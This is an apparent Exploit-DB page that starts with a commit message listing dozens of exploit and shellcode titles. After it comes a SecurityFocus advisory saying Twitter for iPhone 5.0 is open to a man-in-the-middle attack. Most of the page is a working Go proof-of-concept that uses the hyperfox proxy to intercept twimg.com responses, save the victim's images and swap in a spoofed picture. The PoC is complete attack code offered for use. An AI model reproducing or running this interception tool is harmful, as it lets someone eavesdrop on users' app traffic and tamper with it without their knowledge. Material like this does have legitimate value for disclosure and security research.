880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
115 lines
No EOL
2.4 KiB
Python
Executable file
115 lines
No EOL
2.4 KiB
Python
Executable file
source: https://www.securityfocus.com/bid/56665/info
|
|
|
|
Twitter for iPhone is prone to a security vulnerability that lets attackers to perform a man-in-the-middle attack.
|
|
|
|
Attackers can exploit this issue to capture and modify pictures that the user sees in the application.
|
|
|
|
Twitter for iPhone 5.0 is vulnerable; other versions may also be affected.
|
|
|
|
/*
|
|
Twitter App, eavesdroping PoC
|
|
|
|
Written by Carlos Reventlov <carlos@reventlov.com>
|
|
License MIT
|
|
*/
|
|
|
|
package main
|
|
|
|
import (
|
|
"fmt"
|
|
"github.com/xiam/hyperfox/proxy"
|
|
"github.com/xiam/hyperfox/tools/logger"
|
|
"io"
|
|
"log"
|
|
"os"
|
|
"path"
|
|
"strconv"
|
|
"strings"
|
|
)
|
|
|
|
const imageFile = "spoof.jpg"
|
|
|
|
func init() {
|
|
_, err := os.Stat(imageFile)
|
|
if err != nil {
|
|
panic(err.Error())
|
|
}
|
|
}
|
|
|
|
func replaceAvatar(pr *proxy.ProxyRequest) error {
|
|
stat, _ := os.Stat(imageFile)
|
|
image, _ := os.Open(imageFile)
|
|
|
|
host := pr.Response.Request.Host
|
|
|
|
if strings.HasSuffix(host, "twimg.com") == true {
|
|
|
|
if pr.Response.ContentLength != 0 {
|
|
|
|
file := "saved" + proxy.PS + pr.FileName
|
|
|
|
var ext string
|
|
|
|
contentType := pr.Response.Header.Get("Content-Type")
|
|
|
|
switch contentType {
|
|
case "image/jpeg":
|
|
ext = ".jpg"
|
|
case "image/gif":
|
|
ext = ".gif"
|
|
case "image/png":
|
|
ext = ".png"
|
|
case "image/tiff":
|
|
ext = ".tiff"
|
|
}
|
|
|
|
if ext != "" {
|
|
fmt.Printf("** Saving image.\n")
|
|
|
|
os.MkdirAll(path.Dir(file), os.ModeDir|os.FileMode(0755))
|
|
|
|
fp, _ := os.Create(file)
|
|
|
|
if fp == nil {
|
|
fmt.Errorf(fmt.Sprintf("Could not open file %s for writing.", file))
|
|
}
|
|
|
|
io.Copy(fp, pr.Response.Body)
|
|
|
|
fp.Close()
|
|
|
|
pr.Response.Body.Close()
|
|
}
|
|
|
|
}
|
|
|
|
fmt.Printf("** Sending bogus image.\n")
|
|
|
|
pr.Response.ContentLength = stat.Size()
|
|
pr.Response.Header.Set("Content-Type", "image/jpeg")
|
|
pr.Response.Header.Set("Content-Length",
|
|
strconv.Itoa(int(pr.Response.ContentLength)))
|
|
pr.Response.Body = image
|
|
}
|
|
|
|
return nil
|
|
}
|
|
|
|
func main() {
|
|
|
|
p := proxy.New()
|
|
|
|
p.AddDirector(logger.Client(os.Stdout))
|
|
|
|
p.AddInterceptor(replaceAvatar)
|
|
|
|
p.AddLogger(logger.Server(os.Stdout))
|
|
|
|
var err error
|
|
|
|
err = p.Start()
|
|
|
|
if err != nil {
|
|
log.Printf(fmt.Sprintf("Failed to bind: %s.\n", err.Error()))
|
|
}
|
|
} |